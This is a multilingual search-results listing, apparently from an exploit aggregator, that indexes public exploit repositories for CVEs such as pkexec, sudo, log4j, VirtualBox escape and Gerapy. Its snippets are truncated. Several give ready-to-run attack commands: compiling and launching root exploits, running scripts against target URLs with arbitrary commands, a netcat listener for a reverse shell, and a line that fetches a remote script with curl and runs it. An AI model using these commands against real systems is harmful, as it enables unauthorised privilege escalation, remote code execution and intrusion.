228564 matches found
cve-2021-4034
CVE-2021-4034-Exploit, aber in Rust – warum nicht? Basierend auf https://github.com/arthepsy/CVE-2021-4034/blob/main/cve-2021-4034-poc.c root@kitploit: $ ./download-and-unpack-vulnerable-pkexec.sh optional setuid/setgid für Tests aktivieren $ cargo run --bin prep && cd playground && cargo run --b...
copy-fail-go
Copy Fail - CVE-2026-31431 - versione golang ⚠️ AVVISO: Questo programma è estremamente pericoloso e sperimentale. È necessaria una pulizia manuale per eliminare l'exploit. Usalo a tuo rischio! Analisi tecnica repository originale esecuzione controlla /usr/bin/su prima dell'esecuzione:...
Sauercloude
Sauercloude 0day VirtualBox 6.1.2 Escape für RealWorld CTF 2020/2021 CVE-2021-2119...
CVE-2025-31161
Exploit CVE-2025-31161 INSTALLAZIONE 1. root@kitploit: git clone https://github.com/cesarbtakeda/CVE-2025-31161.git && cd CVE-2025-31161 2. Modalità di utilizzo root@kitploit: sudo exploit2.py -h -u HOST -p PORT -tu TARGETUSER -nu NEWUSER -np PASSWORD oppure 1. Dipende dalla libreria lcurl...
copy-fail-CVE-2026-31431-C
copy-fail-CVE-2026-31431-C Verificato su ubuntu 18.04, ubuntu 20.04, ubuntu 22.04, kali 2024, kali 2025, kali 2026 root@kitploit: gcc -o exploit exploit.c -lz && chmod +x exploit && ./exploit Verificato su ubuntu 25.04 arm64 root@kitploit: gcc -o exploit exploitaarch64.c -lz && chmod +x exploit &...
CVE-2021-3156
CVE-2021-3156 Exploit per CVE-2021-3156...
desc_race
descrace iOS 15.1 Kernel-Exploit-POC für CVE-2021-30955 Großer Dank an @realBrightiup für den großartigen Bug und die Exploit-Strategie. Sein Writeup ist zu finden unter: https://www.cyberkl.com/cvelist/cvedetail/24...
CVE-2021-4034
CVE-2021-4034 CVE-2021-4034 em Script Bash Uso: source curl -s https://raw.githubusercontent.com/azminawwar/CVE-2021-4034/main/exploit.sh...
CVE-2021-4034
CVE-2021-4034 Questo è un exploit creato per CVE-2021-4034 pensato come POC. Si basa sulle informazioni presenti su https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt. Come usarlo: Scarica la cartella dell'exploit. Compila prog.c con gcc prog.c Vai nella cartella GCONVPATH=. e assicurati...
log4j-exploit-builder
log4j-exploit-builder Skript zum Erstellen eines log4j-Exploits CVE-2021-44228 mit Unterstützung für verschiedene Methoden, um eine Reverse Shell zu erhalten HINWEIS: Der Code wurde schnell zusammengestellt und wird in Zukunft verbessert...
CVE-2021-4034
CVE-2021-4034 Questo repository contiene l'exploit per la vulnerabilità CVE-2021-4034. Passaggi: 1. gcc cve-2022-4034 -o cve-2022-4034 2 ./cve-2022-4034...
CVE-2021-4034
CVE-2021-4034 Exploit per l'escalation dei privilegi di polkit Basta eseguire make, ./cve-2021-4034 e godersi la propria shell di root. PoC Se l'exploit funziona, otterrai immediatamente una shell di root: root@kitploit: vagrant@ubuntu-impish:/CVE-2021-4034$ make cc -Wall --shared -fPIC -o...
CVE-2021-31956-EXP
Arbeiten unter WIN10 1903 Kein perfektes Erlebnis https://bbs.pediy.com/thread-271140.htm...
CVE-2025-24893
CVE-2025-24893 Utilizzo root@kitploit: python CVE-2025-24893 http://target.com...
copy-fail-CVE-2026-31431-universal
CVE-2026-31431 - PoC UAF Splice AEAD AFALG Implementazione multi-linguaggio e compatibilità con versioni precedenti di Python. C exploit.c root@kitploit: gcc -o exploit exploit.c -O2 gcc -o exploit exploit.c -static -O2 ./exploit Testato su Ubuntu 20.04: Python exploit-python3-8-10.py Compatibile...
CVE-2023-51385
CVE-2023-51385 PoC Exploit per CVE-2023-51385...
CVE-2026-22812-Exp
CVE-2026-22812-Exp CVE-2026-22812...
CVE-2021-43857-Gerapy-v0.9.7
CVE-2021-43857-Gerapy-v0.9.7 Connectez-vous au portail en tant qu'admin Ajoutez un nouveau projet sudo nc -lvnp 80 searchsploit -m python/remote/50640.py python3 ./50640.py -t IP-TARGET/URL -p PORT-TARGET -L YOUR-KALI-LINUX-IP -P YOUR-LISTENER-PORT python3 ./50640.py -t 192.168.106.24 -p 8000 -L...
CVE-2026-21962
CVE-2026-21962 CVE-2026-21962 ESEMPIO Singolo target root@kitploit: python3 CVE-2026-21962.py http://target:7001 -c "whoami" Batch + whoami predefinito root@kitploit: python3 CVE-2026-21962.py -f url.txt Batch + comando personalizzato + modifica del numero di thread root@kitploit: python3...